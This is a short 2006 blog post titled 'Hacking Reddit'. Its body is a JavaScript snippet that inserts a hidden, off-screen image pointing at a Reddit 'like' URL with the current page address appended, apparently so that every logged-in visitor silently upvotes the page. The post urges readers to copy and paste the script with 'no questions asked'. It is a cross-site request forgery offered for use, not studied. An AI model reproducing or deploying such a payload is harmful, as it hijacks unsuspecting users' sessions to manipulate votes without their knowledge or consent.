<$BlogRSDUrl$> <body style="background-color: #FEFCF1"><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/platform.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d6395693\x26blogName\x3dmordant+wit\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dTAN\x26layoutType\x3dCLASSIC\x26searchRoot\x3dhttps://mordantwit.blogspot.com/search\x26blogLocale\x3den_US\x26v\x3d2\x26homepageUrl\x3dhttp://mordantwit.blogspot.com/\x26vt\x3d-11873617807163903', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe" }); } }); </script>
Google
 
Web mordantwit.blogspot.com

March 13, 2006

 

Hacking Reddit 


<script type="text/javascript">
<!--
// The encoded version of the current page
var page = encodeURIComponent(location.href);

// Create an image on the page, give it an address, then style it
var child = document.createElement("img");
child.src = 'http://reddit.com/d/like'+Math.random()+'?u='+page;
child.style.position = "absolute";
child.style.left = "-9000px";

// Finally push it out on the current page
var daddy = document.getElementsByTagName('body')[0];
daddy.appendChild(child);
// -->

</script>


Just copy paste the above script! No questions asked!

If you still have questions then click here



 
 
Comments: Post a Comment

This page is powered by Blogger. Isn't yours?